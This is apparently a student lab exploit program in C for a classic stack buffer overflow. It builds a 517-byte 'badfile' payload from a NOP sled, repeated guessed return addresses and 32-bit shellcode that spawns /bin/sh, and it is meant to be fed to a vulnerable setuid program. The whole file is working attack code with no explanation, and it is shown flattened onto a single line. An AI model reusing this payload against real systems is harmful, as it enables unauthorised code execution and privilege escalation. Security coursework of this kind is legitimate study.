//exploit.c #include <stdio.h> #include <stdlib.h> #include <string.h> #define DEFAULT_OFFSET 350 char code[]= "\x31\xc0" "\x50" "\x68""//sh" "\x68""/bin" "\x89\xe3" "\x50" "\x53" "\x89\xe1" "\x99" "\xb0\x0b" "\xcd\x80" ; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char **argv) { char buffer[517]; FILE *badfile; char *ptr; long *a_ptr,ret; int offset = DEFAULT_OFFSET; int codeSize = sizeof(code); int buffSize = sizeof(buffer); if(argc > 1) offset = atoi(argv[1]); //this allows for command line input ptr=buffer; a_ptr = (long *) ptr; /* Initialize buffer with 0x90 (NOP instruction) */ memset(buffer, 0x90, buffSize); //----------------------BEGIN FILL BUFFER----------------------\\ ret = get_sp()+offset; printf("Return Address: 0x%x\n",get_sp()); printf("Address: 0x%x\n",ret); ptr = buffer; a_ptr = (long *) ptr; int i; for (i = 0; i < 300;i+=4) *(a_ptr++) = ret; for(i = 486;i < codeSize + 486;++i) buffer[i] = code[i-486]; buffer[buffSize - 1] = '\0'; //-----------------------END FILL BUFFER-----------------------\\ /* Save the contents to the file "badfile" */ badfile = fopen("./badfile", "w"); fwrite(buffer,517,1,badfile); fclose(badfile); }